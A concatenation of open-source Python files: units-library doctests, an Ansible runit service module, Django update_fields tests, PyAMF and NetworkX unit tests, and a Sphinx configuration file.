... R = MOLAR_GAS_CONSTANT_R
... print("P * V = ", P * V)
... print("R * T = ", R * T)
... return (P * V / (R * T)).in_units_of(mole)
...
>>> T = (273.0 + 37.0) * kelvin
>>> P = 1.01325e5 * pascals
>>> r = 0.5e-6 * meters
>>> V = 4.0/3.0 * 3.14159 * r**3
>>> n = idealGasLaw(P, V, T)
P * V = 5.3053601125e-14 m**3 Pa
R * T = 2577.48646608 J/mol
>>> R = MOLAR_GAS_CONSTANT_R
>>>
>>> print("r = ", r)
r = 5e-07 m
>>> print("P = ", P)
P = 101325.0 Pa
>>> print("V = ", V)
V = 5.23598333333e-19 m**3
>>> print("T = ", T)
T = 310.0 K
>>> print("n = ", n)
n = 2.05834644811e-17 mol
>>> print("R = ", R)
R = 8.31447247122 J/(K mol)
>>> print("E = ", E)
E = 1.0 kg m**2/(s**2)
>>> print("is_quantity(V) = ", is_quantity(V))
is_quantity(V) = True
>>> print((1.0*radians) / degrees)
57.2957795131
>>> print((1.0*radians).in_units_of(degrees))
57.2957795131 deg
>>> print((1.0*angstroms).in_units_of(nanometers))
0.1 nm
>>>
>>> print((90*degrees)/radians)
1.57079632679
>>> print(sin(90*degrees))
1.0
>>> x = 90 * degrees
>>> x += 0.3 * radians
>>> print(x)
107.188733854 deg
>>> print(1 * nanometers > 1 * angstroms)
True
>>> print(1 * nanometers > 1 * degrees)
Traceback (most recent call last):
...
TypeError: Unit "degree" is not compatible with Unit "nanometer".
>>>
>>> x = 1.5 * nanometers
>>> print(x / meters)
1.5e-09
>>> x = 1.5 * angstroms
>>> print(x / meters)
1.5e-10
>>> print(x / nanometers)
0.15
Examples
>>> print(is_quantity(meters))
False
>>> print(is_quantity(2.3*meters))
True
>>> print(is_quantity(2.3))
False
Examples
>>> x = 100.0 * millimeter
>>> print(x.value_in_unit_system(si_unit_system))
0.1
>>> print(x.value_in_unit_system(cgs_unit_system))
10.0
>>> print(x.value_in_unit_system(md_unit_system))
100000000.0
>>>
>>> y = 20 * millimeters / millisecond**2
>>> print(y.value_in_unit_system(si_unit_system))
20000.0
>>> print(y.value_in_unit_system(cgs_unit_system))
2000000.0
>>> print(y.value_in_unit_system(md_unit_system))
2e-11
>>> eps = Quantity(1.0, md_kilocalorie/mole)
>>> epsQ = eps.value_in_unit_system(md_unit_system)
>>> print(epsQ)
4.184
Dimensionless quantities return their unmodified values.
>>> Quantity(5, dimensionless).value_in_unit_system(md_unit_system)
5
Examples
>>> x = 2.3*meters
>>> print(x.value_in_unit(centimeters))
230.0
Examples
>>> print(bool(2.3*meters))
True
>>> print(bool(0*meters))
False
Examples
>>> print(-(2.3*meters))
-2.3 m
>>> print(-(-2.3*meters))
2.3 m
Examples
>>> print(+(2.3*meters))
2.3 m
Examples
>>> print(abs(-2.3*meters))
2.3 m
>>> (9.0*meter*meter).sqrt()
Quantity(value=3.0, unit=meter)
>>> (9.0*meter).sqrt()
Traceback (most recent call last):
...
ArithmeticError: Exponents in Unit.sqrt() must be even.
>>> (9.0*meter*meter*meter).sqrt()
Traceback (most recent call last):
...
ArithmeticError: Exponents in Unit.sqrt() must be even.
>>> (9.0*meter*meter/second/second).sqrt()
Quantity(value=3.0, unit=meter/second)
Mixture of BaseUnits and ScaledUnits should cause no trouble:
>>> sqrt(1.0 * kilogram * joule)
Quantity(value=1.0, unit=kilogram*meter/second)
>>> sqrt(1.0 * kilogram * calorie)
Quantity(value=2.0454828280872954, unit=kilogram*meter/second)
Examples
>>> print((2.3*meters)**2)
5.29 m**2
Examples
>>> x = 4.2 * centimeters
>>> print(8.4 / x)
2.0 /cm
Examples
>>> x = 4.3 * meters
>>> print(x/centimeters)
430.0
>>> print(x/seconds)
4.3 m/s
>>> x = [1,2,3]*centimeter
>>> x/millimeter
[10.0, 20.0, 30.0]
Examples
>>> x = 1.2*meters
>>> print(5*x)
6.0 m
Examples
>>> x = 1.2*meters
>>> y = 72*centimeters
>>> print(x*y)
0.864 m**2
>>> x = [1,2,3]*centimeter
>>> x
Quantity(value=[1, 2, 3], unit=centimeter)
>>> x * meter
Quantity(value=[100.0, 200.0, 300.0], unit=centimeter**2)
>>> u = nanometer**2/angstrom**2
>>> print(u)
nanometer**2/(angstrom**2)
>>> q = Quantity(2.0, u)
>>> q
Quantity(value=2.0, unit=nanometer**2/(angstrom**2))
>>> "%.1f" % q.reduce_unit()
'200.0'
Examples
>>> 1.2*meters < 72*centimeters
False
>>> meter != None
True
>>> meter == None
False
Examples
>>> print(1.2 * meters - 72 * centimeters)
0.48 m
Examples
>>> print(1.2 * meters + 72 * centimeters)
1.92 m
Examples
>>> print(repr(1.2*meter))
Quantity(value=1.2, unit=meter)
Examples
>>> print(5.0 * nanometers)
5.0 nm
Examples
>>> Quantity(5.0, meters)
Quantity(value=5.0, unit=meter)
>>> Quantity([1*angstrom,2*nanometer,3*angstrom])
Quantity(value=[1, 20.0, 3], unit=angstrom)
>>> Quantity((1,2,3))
Quantity(value=(1, 2, 3), unit=dimensionless)
>>> Quantity([1*angstrom,2*nanometer,3*angstrom])
Quantity(value=[1, 20.0, 3], unit=angstrom)
>>> Quantity([1*angstrom,2*nanometer,3*second])
Traceback (most recent call last):
...
TypeError: Unit "second" is not compatible with Unit "angstrom".
>>> Quantity(5)
Quantity(value=5, unit=dimensionless)
Passing a unit to the constructor yields a Quantity with an empty list value.
>>> Quantity(angstrom)
Quantity(value=[], unit=angstrom)
>>> Quantity(5*angstrom)
Quantity(value=5, unit=angstrom)
>>> Quantity(([1*angstrom,2*nanometer,3*angstrom], [1*angstrom,4*nanometer,3*angstrom]))
Quantity(value=([1, 20.0, 3], [1, 40.0, 3]), unit=angstrom)
>>> Quantity([])
Quantity(value=[], unit=dimensionless)
A simple scalar Quantity can be used as the unit argument.
>>> Quantity(value=5.0, unit=100.0*meters)
Quantity(value=500.0, unit=meter)
Examples
>>> x = 2.3*meters
>>> y = x.in_units_of(centimeters)
>>> print(y)
230.0 cm
>>> x = 2.3*meters
>>> print(x.in_units_of(centimeters))
230.0 cm
>>> print(x.in_units_of(seconds))
Traceback (most recent call last):
...
TypeError: Unit "meter" is not compatible with Unit "second".
Examples
>>> x = 100.0 * millimeter
>>> print(x)
100.0 mm
>>> print(x.in_unit_system(si_unit_system))
0.1 m
>>> print(x.in_unit_system(cgs_unit_system))
10.0 cm
>>> print(x.in_unit_system(md_unit_system))
100000000.0 nm
>>> y = 20 * millimeters / millisecond**2
>>> print(y)
20 mm/(ms**2)
>>> print(y.in_unit_system(si_unit_system))
20000.0 m/(s**2)
>>> print(y.in_unit_system(cgs_unit_system))
2000000.0 cm/(s**2)
>>> print(y.in_unit_system(md_unit_system))
2e-11 nm/(ps**2)
Sometimes mixed internal units have caused trouble:
>>> q = 1.0 * md_kilocalorie/mole/angstrom
>>> print(q.in_units_of(md_kilojoule/mole/nanometer))
41.84 kJ/(nm mol)
Examples
>>> class Foo:
... def bar(self):
... print("bar")
...
>>> x = Foo()
>>> x.bar()
bar
>>> y = x * nanometers
>>> y.bar()
bar
Examples
>>> print(meters * centimeters)
centimeter*meter
>>> print(meters * meters)
meter**2
>>> print(meter * meter )
meter**2
Examples
>>> print(meter / 2)
0.5 m
Examples
>>> define_prefixed_units(kelvin_base_unit, sys.modules["__main__"])
>>> from __main__ import millikelvin
>>> print(5.0 * millikelvin)
5.0 mK
Creating a new BaseUnit:
>>> ms = milli * second_base_unit
>>> ms
BaseUnit(base_dim=BaseDimension("time"), name="millisecond", symbol="ms")
>>> ms.conversion_factor_to(second_base_unit)
0.001
Creating a new ScaledUnit:
>>> mC = milli * ScaledUnit(4.184, joule, "calorie", "cal")
>>> mC
ScaledUnit(factor=0.0041840000000000002, master=joule, name='millicalorie', symbol='mcal')
Creating a new Unit:
>>> ms = milli * second
>>> ms
Unit({BaseUnit(base_dim=BaseDimension("time"), name="millisecond", symbol="ms"): 1.0})
Don't try a Quantity though:
>>> ms = milli * (1.0 * second)
Traceback (most recent call last):
...
TypeError: Unit prefix "milli" can only be applied to a Unit, BaseUnit, or ScaledUnit.
Comparison of dimensionless quantities issue (fixed in svn 513)
>>> x = Quantity(1.0, dimensionless)
>>> y = Quantity(1.0, dimensionless)
>>> assert not x is y
>>> assert x == y
Formatting of Quantities
>>> x = 5.439999999 * picosecond
>>> x
Quantity(value=5.4399999990000003, unit=picosecond)
>>> x.format("%.3f")
'5.440 ps'
# Bug report Dec 17, 2009 from John Chodera
# deepcopy of Quantity containing numpy array wrongly strips units
>>> try:
... import numpy
... import copy
... x = Quantity(numpy.zeros([2,3]), nanometer)
... y = copy.deepcopy(x)
... assert x[0][0] == y[0][0]
... except ImportError:
... pass
# Passing a string through Quantity constructor should return a string/dimensionless
>>> x = Quantity("string").value_in_unit_system(md_unit_system)
>>> assert x == "string"
# Trouble with complicated unit conversion factors
# Jan 29 1010 email from John Chodera
>>> p1 = 1.0 * atmosphere
>>> p2 = (1.0 * atmosphere).in_units_of(joule/nanometer**3)
>>> V = 2.4 * nanometer**3
>>> beta = 4.e-4 * mole/joule
>>> x1 = beta*p1*V
>>> # print(x1)
... y1 = x1 * AVOGADRO_CONSTANT_NA
>>> print(y1)
0.0585785776197
# Wrong answer is 5.85785776197e+25
>>> x2 = beta*p2*V
>>> # print(x2)
... y2 = x2 * AVOGADRO_CONSTANT_NA
>>> print(y2)
0.0585785776197
>>> assert( abs(y1 - y2) < 0.01)
# division of numpy arrays error
# April 2010, thanks to John Chodera for reporting
>>> try:
... import numpy
... x = Quantity(numpy.array([1.,2.]), nanometer)
... y = Quantity(numpy.array([3.,4.]), picosecond)
... assert str(x/y) == '[ 0.33333333 0.5 ] nm/ps'
... except ImportError:
... pass
# another numpy problem from retarded implementation of == operator
# Thanks to Kyle Beauchamp July 2010
>>> try:
... import numpy
... from simtk.unit.quantity import _is_string
... a = numpy.array([[1,2,3],[4,5,6]])
... assert isinstance("", str)
... assert _is_string("")
... assert _is_string("t")
... assert _is_string("test")
... assert not _is_string(3)
... assert not _is_string(a)
... except ImportError:
... pass
"""
from __future__ import print_function
__author__ = "Christopher M. Bruns"
__version__ = "0.5"
# This unit code might be found in different packages...
# So use local import
from baseunit import BaseUnit
from standard_dimensions import *
from unit import is_unit, dimensionless
from quantity import Quantity, is_quantity, is_dimensionless
from unit_definitions import *
from unit_math import *
from constants import *
# run module directly for testing
if __name__=='__main__':
# Test the examples in the docstrings
import doctest, sys
(failed, passed) = doctest.testmod(sys.modules[__name__])
# For use in automated testing, return number of failed tests as exit code
exit(failed)
|
lgpl-2.1
|
sorenk/ansible
|
lib/ansible/modules/system/runit.py
|
64
|
8646
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright: (c) 2015, Brian Coca <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'community'}
# This is a modification of @bcoca's `svc` module
DOCUMENTATION = '''
---
module: runit
author:
- James Sumners (@jsumners)
version_added: "2.3"
short_description: Manage runit services
description:
- Controls runit services on remote hosts using the sv utility.
options:
name:
description:
- Name of the service to manage.
required: yes
state:
description:
- C(started)/C(stopped) are idempotent actions that will not run
commands unless necessary. C(restarted) will always bounce the
service (sv restart) and C(killed) will always bounce the service (sv force-stop).
C(reloaded) will send a HUP (sv reload).
C(once) will run a normally downed sv once (sv once), not really
an idempotent operation.
choices: [ killed, once, reloaded, restarted, started, stopped ]
enabled:
description:
- Whether the service is enabled or not, if disabled it also implies stopped.
type: bool
service_dir:
description:
- directory runsv watches for services
default: /var/service
service_src:
description:
- directory where services are defined, the source of symlinks to service_dir.
default: /etc/sv
'''
EXAMPLES = '''
- name: Start sv dnscache, if not running
runit:
name: dnscache
state: started
- name: Stop sv dnscache, if running
runit:
name: dnscache
state: stopped
- name: Kill sv dnscache, in all cases
runit:
name: dnscache
state: killed
- name: Restart sv dnscache, in all cases
runit:
name: dnscache
state: restarted
- name: Reload sv dnscache, in all cases
runit:
name: dnscache
state: reloaded
- name: Use alternative sv directory location
runit:
name: dnscache
state: reloaded
service_dir: /run/service
'''
import os
import re
import traceback
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils._text import to_native
def _load_dist_subclass(cls, *args, **kwargs):
'''
Used for derivative implementations
'''
subclass = None
distro = kwargs['module'].params['distro']
# get the most specific superclass for this platform
if distro is not None:
for sc in cls.__subclasses__():
if sc.distro is not None and sc.distro == distro:
subclass = sc
if subclass is None:
subclass = cls
return super(cls, subclass).__new__(subclass)
class Sv(object):
"""
Main class that handles daemontools, can be subclassed and overridden in case
we want to use a 'derivative' like encore, s6, etc
"""
# def __new__(cls, *args, **kwargs):
# return _load_dist_subclass(cls, args, kwargs)
def __init__(self, module):
self.extra_paths = []
self.report_vars = ['state', 'enabled', 'svc_full', 'src_full', 'pid', 'duration', 'full_state']
self.module = module
self.name = module.params['name']
self.service_dir = module.params['service_dir']
self.service_src = module.params['service_src']
self.enabled = None
self.full_state = None
self.state = None
self.pid = None
self.duration = None
self.svc_cmd = module.get_bin_path('sv', opt_dirs=self.extra_paths, required=True)
self.svstat_cmd = module.get_bin_path('sv', opt_dirs=self.extra_paths)
self.svc_full = '/'.join([self.service_dir, self.name])
self.src_full = '/'.join([self.service_src, self.name])
self.enabled = os.path.lexists(self.svc_full)
if self.enabled:
self.get_status()
else:
self.state = 'stopped'
def enable(self):
if os.path.exists(self.src_full):
try:
os.symlink(self.src_full, self.svc_full)
except OSError as e:
self.module.fail_json(path=self.src_full, msg='Error while linking: %s' % to_native(e))
else:
self.module.fail_json(msg="Could not find source for service to enable (%s)." % self.src_full)
def disable(self):
self.execute_command([self.svc_cmd, 'force-stop', self.src_full])
try:
os.unlink(self.svc_full)
except OSError as e:
self.module.fail_json(path=self.svc_full, msg='Error while unlinking: %s' % to_native(e))
def get_status(self):
(rc, out, err) = self.execute_command([self.svstat_cmd, 'status', self.svc_full])
if err is not None and err:
self.full_state = self.state = err
else:
self.full_state = out
# full_state *may* contain information about the logger:
# "down: /etc/service/service-without-logger: 1s, normally up\n"
# "down: /etc/service/updater: 127s, normally up; run: log: (pid 364) 263439s\n"
full_state_no_logger = self.full_state.split("; ")[0]
m = re.search(r'\(pid (\d+)\)', full_state_no_logger)
if m:
self.pid = m.group(1)
m = re.search(r' (\d+)s', full_state_no_logger)
if m:
self.duration = m.group(1)
if re.search(r'^run:', full_state_no_logger):
self.state = 'started'
elif re.search(r'^down:', full_state_no_logger):
self.state = 'stopped'
else:
self.state = 'unknown'
return
def started(self):
return self.start()
def start(self):
return self.execute_command([self.svc_cmd, 'start', self.svc_full])
def stopped(self):
return self.stop()
def stop(self):
return self.execute_command([self.svc_cmd, 'stop', self.svc_full])
def once(self):
return self.execute_command([self.svc_cmd, 'once', self.svc_full])
def reloaded(self):
return self.reload()
def reload(self):
return self.execute_command([self.svc_cmd, 'reload', self.svc_full])
def restarted(self):
return self.restart()
def restart(self):
return self.execute_command([self.svc_cmd, 'restart', self.svc_full])
def killed(self):
return self.kill()
def kill(self):
return self.execute_command([self.svc_cmd, 'force-stop', self.svc_full])
def execute_command(self, cmd):
try:
(rc, out, err) = self.module.run_command(' '.join(cmd))
except Exception as e:
self.module.fail_json(msg="failed to execute: %s" % to_native(e), exception=traceback.format_exc())
return (rc, out, err)
def report(self):
self.get_status()
states = {}
for k in self.report_vars:
states[k] = self.__dict__[k]
return states
def main():
module = AnsibleModule(
argument_spec=dict(
name=dict(type='str', required=True),
state=dict(type='str', choices=['killed', 'once', 'reloaded', 'restarted', 'started', 'stopped']),
enabled=dict(type='bool'),
dist=dict(type='str', default='runit'),
service_dir=dict(type='str', default='/var/service'),
service_src=dict(type='str', default='/etc/sv'),
),
supports_check_mode=True,
)
module.run_command_environ_update = dict(LANG='C', LC_ALL='C', LC_MESSAGES='C', LC_CTYPE='C')
state = module.params['state']
enabled = module.params['enabled']
sv = Sv(module)
changed = False
orig_state = sv.report()
if enabled is not None and enabled != sv.enabled:
changed = True
if not module.check_mode:
try:
if enabled:
sv.enable()
else:
sv.disable()
except (OSError, IOError) as e:
module.fail_json(msg="Could not change service link: %s" % to_native(e), exception=traceback.format_exc())
if state is not None and state != sv.state:
changed = True
if not module.check_mode:
getattr(sv, state)()
module.exit_json(changed=changed, sv=sv.report())
if __name__ == '__main__':
main()
|
gpl-3.0
|
zanderle/django
|
tests/update_only_fields/tests.py
|
296
|
9780
|
from __future__ import unicode_literals
from django.db.models.signals import post_save, pre_save
from django.test import TestCase
from .models import Account, Employee, Person, Profile, ProxyEmployee
class UpdateOnlyFieldsTests(TestCase):
def test_update_fields_basic(self):
s = Person.objects.create(name='Sara', gender='F')
self.assertEqual(s.gender, 'F')
s.gender = 'M'
s.name = 'Ian'
s.save(update_fields=['name'])
s = Person.objects.get(pk=s.pk)
self.assertEqual(s.gender, 'F')
self.assertEqual(s.name, 'Ian')
def test_update_fields_deferred(self):
s = Person.objects.create(name='Sara', gender='F', pid=22)
self.assertEqual(s.gender, 'F')
s1 = Person.objects.defer("gender", "pid").get(pk=s.pk)
s1.name = "Emily"
s1.gender = "M"
with self.assertNumQueries(1):
s1.save()
s2 = Person.objects.get(pk=s1.pk)
self.assertEqual(s2.name, "Emily")
self.assertEqual(s2.gender, "M")
def test_update_fields_only_1(self):
s = Person.objects.create(name='Sara', gender='F')
self.assertEqual(s.gender, 'F')
s1 = Person.objects.only('name').get(pk=s.pk)
s1.name = "Emily"
s1.gender = "M"
with self.assertNumQueries(1):
s1.save()
s2 = Person.objects.get(pk=s1.pk)
self.assertEqual(s2.name, "Emily")
self.assertEqual(s2.gender, "M")
def test_update_fields_only_2(self):
s = Person.objects.create(name='Sara', gender='F', pid=22)
self.assertEqual(s.gender, 'F')
s1 = Person.objects.only('name').get(pk=s.pk)
s1.name = "Emily"
s1.gender = "M"
with self.assertNumQueries(2):
s1.save(update_fields=['pid'])
s2 = Person.objects.get(pk=s1.pk)
self.assertEqual(s2.name, "Sara")
self.assertEqual(s2.gender, "F")
def test_update_fields_only_repeated(self):
s = Person.objects.create(name='Sara', gender='F')
self.assertEqual(s.gender, 'F')
s1 = Person.objects.only('name').get(pk=s.pk)
s1.gender = 'M'
with self.assertNumQueries(1):
s1.save()
        # Test that the deferred class does not remember that gender was
        # set; instead, the instance should remember this.
s1 = Person.objects.only('name').get(pk=s.pk)
with self.assertNumQueries(1):
s1.save()
def test_update_fields_inheritance_defer(self):
profile_boss = Profile.objects.create(name='Boss', salary=3000)
e1 = Employee.objects.create(name='Sara', gender='F',
employee_num=1, profile=profile_boss)
e1 = Employee.objects.only('name').get(pk=e1.pk)
e1.name = 'Linda'
with self.assertNumQueries(1):
e1.save()
self.assertEqual(Employee.objects.get(pk=e1.pk).name,
'Linda')
def test_update_fields_fk_defer(self):
profile_boss = Profile.objects.create(name='Boss', salary=3000)
profile_receptionist = Profile.objects.create(name='Receptionist', salary=1000)
e1 = Employee.objects.create(name='Sara', gender='F',
employee_num=1, profile=profile_boss)
e1 = Employee.objects.only('profile').get(pk=e1.pk)
e1.profile = profile_receptionist
with self.assertNumQueries(1):
e1.save()
self.assertEqual(Employee.objects.get(pk=e1.pk).profile, profile_receptionist)
e1.profile_id = profile_boss.pk
with self.assertNumQueries(1):
e1.save()
self.assertEqual(Employee.objects.get(pk=e1.pk).profile, profile_boss)
def test_select_related_only_interaction(self):
profile_boss = Profile.objects.create(name='Boss', salary=3000)
e1 = Employee.objects.create(name='Sara', gender='F',
employee_num=1, profile=profile_boss)
e1 = Employee.objects.only('profile__salary').select_related('profile').get(pk=e1.pk)
profile_boss.name = 'Clerk'
profile_boss.salary = 1000
profile_boss.save()
# The loaded salary of 3000 gets saved, the name of 'Clerk' isn't
# overwritten.
with self.assertNumQueries(1):
e1.profile.save()
reloaded_profile = Profile.objects.get(pk=profile_boss.pk)
self.assertEqual(reloaded_profile.name, profile_boss.name)
self.assertEqual(reloaded_profile.salary, 3000)
def test_update_fields_m2m(self):
profile_boss = Profile.objects.create(name='Boss', salary=3000)
e1 = Employee.objects.create(name='Sara', gender='F',
employee_num=1, profile=profile_boss)
a1 = Account.objects.create(num=1)
a2 = Account.objects.create(num=2)
e1.accounts = [a1, a2]
with self.assertRaises(ValueError):
e1.save(update_fields=['accounts'])
def test_update_fields_inheritance(self):
profile_boss = Profile.objects.create(name='Boss', salary=3000)
profile_receptionist = Profile.objects.create(name='Receptionist', salary=1000)
e1 = Employee.objects.create(name='Sara', gender='F',
employee_num=1, profile=profile_boss)
e1.name = 'Ian'
e1.gender = 'M'
e1.save(update_fields=['name'])
e2 = Employee.objects.get(pk=e1.pk)
self.assertEqual(e2.name, 'Ian')
self.assertEqual(e2.gender, 'F')
self.assertEqual(e2.profile, profile_boss)
e2.profile = profile_receptionist
e2.name = 'Sara'
e2.save(update_fields=['profile'])
e3 = Employee.objects.get(pk=e1.pk)
self.assertEqual(e3.name, 'Ian')
self.assertEqual(e3.profile, profile_receptionist)
with self.assertNumQueries(1):
e3.profile = profile_boss
e3.save(update_fields=['profile_id'])
e4 = Employee.objects.get(pk=e3.pk)
self.assertEqual(e4.profile, profile_boss)
self.assertEqual(e4.profile_id, profile_boss.pk)
def test_update_fields_inheritance_with_proxy_model(self):
profile_boss = Profile.objects.create(name='Boss', salary=3000)
profile_receptionist = Profile.objects.create(name='Receptionist', salary=1000)
e1 = ProxyEmployee.objects.create(name='Sara', gender='F',
employee_num=1, profile=profile_boss)
e1.name = 'Ian'
e1.gender = 'M'
e1.save(update_fields=['name'])
e2 = ProxyEmployee.objects.get(pk=e1.pk)
self.assertEqual(e2.name, 'Ian')
self.assertEqual(e2.gender, 'F')
self.assertEqual(e2.profile, profile_boss)
e2.profile = profile_receptionist
e2.name = 'Sara'
e2.save(update_fields=['profile'])
e3 = ProxyEmployee.objects.get(pk=e1.pk)
self.assertEqual(e3.name, 'Ian')
self.assertEqual(e3.profile, profile_receptionist)
def test_update_fields_signals(self):
p = Person.objects.create(name='Sara', gender='F')
pre_save_data = []
def pre_save_receiver(**kwargs):
pre_save_data.append(kwargs['update_fields'])
pre_save.connect(pre_save_receiver)
post_save_data = []
def post_save_receiver(**kwargs):
post_save_data.append(kwargs['update_fields'])
post_save.connect(post_save_receiver)
p.save(update_fields=['name'])
self.assertEqual(len(pre_save_data), 1)
self.assertEqual(len(pre_save_data[0]), 1)
self.assertIn('name', pre_save_data[0])
self.assertEqual(len(post_save_data), 1)
self.assertEqual(len(post_save_data[0]), 1)
self.assertIn('name', post_save_data[0])
pre_save.disconnect(pre_save_receiver)
post_save.disconnect(post_save_receiver)
def test_update_fields_incorrect_params(self):
s = Person.objects.create(name='Sara', gender='F')
with self.assertRaises(ValueError):
s.save(update_fields=['first_name'])
with self.assertRaises(ValueError):
s.save(update_fields="name")
def test_empty_update_fields(self):
s = Person.objects.create(name='Sara', gender='F')
pre_save_data = []
def pre_save_receiver(**kwargs):
pre_save_data.append(kwargs['update_fields'])
pre_save.connect(pre_save_receiver)
post_save_data = []
def post_save_receiver(**kwargs):
post_save_data.append(kwargs['update_fields'])
post_save.connect(post_save_receiver)
# Save is skipped.
with self.assertNumQueries(0):
s.save(update_fields=[])
# Signals were skipped, too...
self.assertEqual(len(pre_save_data), 0)
self.assertEqual(len(post_save_data), 0)
pre_save.disconnect(pre_save_receiver)
post_save.disconnect(post_save_receiver)
def test_num_queries_inheritance(self):
s = Employee.objects.create(name='Sara', gender='F')
s.employee_num = 1
s.name = 'Emily'
with self.assertNumQueries(1):
s.save(update_fields=['employee_num'])
s = Employee.objects.get(pk=s.pk)
self.assertEqual(s.employee_num, 1)
self.assertEqual(s.name, 'Sara')
s.employee_num = 2
s.name = 'Emily'
with self.assertNumQueries(1):
s.save(update_fields=['name'])
s = Employee.objects.get(pk=s.pk)
self.assertEqual(s.name, 'Emily')
self.assertEqual(s.employee_num, 1)
# A little sanity check that we actually did updates...
self.assertEqual(Employee.objects.count(), 1)
self.assertEqual(Person.objects.count(), 1)
with self.assertNumQueries(2):
s.save(update_fields=['name', 'employee_num'])
|
bsd-3-clause
|
SpiderLabs/deblaze
|
pyamf/pyamf/tests/modules/test_decimal.py
|
2
|
1030
|
# Copyright (c) 2007-2009 The PyAMF Project.
# See LICENSE for details.
"""
Tests for the C{decimal} module integration.
"""
import unittest
import decimal
import pyamf
class DecimalTestCase(unittest.TestCase):
def test_amf0_encode(self):
x = decimal.Decimal('1.23456463452345')
self.assertEquals(pyamf.encode(x, encoding=pyamf.AMF0, strict=False).getvalue(),
'\x00?\xf3\xc0\xc6\xd8\xa18\xfa')
self.assertRaises(pyamf.EncodeError, pyamf.encode, x, encoding=pyamf.AMF0, strict=True)
def test_amf3_encode(self):
x = decimal.Decimal('1.23456463452345')
self.assertEquals(pyamf.encode(x, encoding=pyamf.AMF3, strict=False).getvalue(),
'\x05?\xf3\xc0\xc6\xd8\xa18\xfa')
self.assertRaises(pyamf.EncodeError, pyamf.encode, x, encoding=pyamf.AMF3, strict=True)
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(DecimalTestCase))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='suite')
|
gpl-3.0
|
DougFirErickson/qgisSpaceSyntaxToolkit
|
esstoolkit/external/networkx/algorithms/link_analysis/tests/test_hits.py
|
79
|
2544
|
#!/usr/bin/env python
from nose.tools import *
from nose import SkipTest
from nose.plugins.attrib import attr
import networkx
# Example from
# A. Langville and C. Meyer, "A survey of eigenvector methods of web
# information retrieval." http://citeseer.ist.psu.edu/713792.html
class TestHITS:
def setUp(self):
G=networkx.DiGraph()
edges=[(1,3),(1,5),\
(2,1),\
(3,5),\
(5,4),(5,3),\
(6,5)]
G.add_edges_from(edges,weight=1)
self.G=G
self.G.a=dict(zip(G,[0.000000, 0.000000, 0.366025,
0.133975, 0.500000, 0.000000]))
self.G.h=dict(zip(G,[ 0.366025, 0.000000, 0.211325,
0.000000, 0.211325, 0.211325]))
def test_hits(self):
G=self.G
h,a=networkx.hits(G,tol=1.e-08)
for n in G:
assert_almost_equal(h[n],G.h[n],places=4)
for n in G:
assert_almost_equal(a[n],G.a[n],places=4)
def test_hits_nstart(self):
G = self.G
nstart = dict([(i, 1./2) for i in G])
h, a = networkx.hits(G, nstart = nstart)
@attr('numpy')
def test_hits_numpy(self):
try:
import numpy as np
except ImportError:
raise SkipTest('NumPy not available.')
G=self.G
h,a=networkx.hits_numpy(G)
for n in G:
assert_almost_equal(h[n],G.h[n],places=4)
for n in G:
assert_almost_equal(a[n],G.a[n],places=4)
def test_hits_scipy(self):
try:
import scipy as sp
except ImportError:
raise SkipTest('SciPy not available.')
G=self.G
h,a=networkx.hits_scipy(G,tol=1.e-08)
for n in G:
assert_almost_equal(h[n],G.h[n],places=4)
for n in G:
assert_almost_equal(a[n],G.a[n],places=4)
@attr('numpy')
def test_empty(self):
try:
import numpy
except ImportError:
raise SkipTest('numpy not available.')
G=networkx.Graph()
assert_equal(networkx.hits(G),({},{}))
assert_equal(networkx.hits_numpy(G),({},{}))
assert_equal(networkx.authority_matrix(G).shape,(0,0))
assert_equal(networkx.hub_matrix(G).shape,(0,0))
def test_empty_scipy(self):
try:
import scipy
except ImportError:
raise SkipTest('scipy not available.')
G=networkx.Graph()
assert_equal(networkx.hits_scipy(G),({},{}))
|
gpl-3.0
|
tailhook/quire
|
doc/conf.py
|
1
|
7731
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Quire documentation build configuration file, created by
# sphinx-quickstart on Wed Oct 16 19:11:54 2013.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'Quire'
copyright = '2013, Paul Colomiets'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '2.0'
# The full version, including alpha/beta/rc tags.
release = '2.0-beta1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
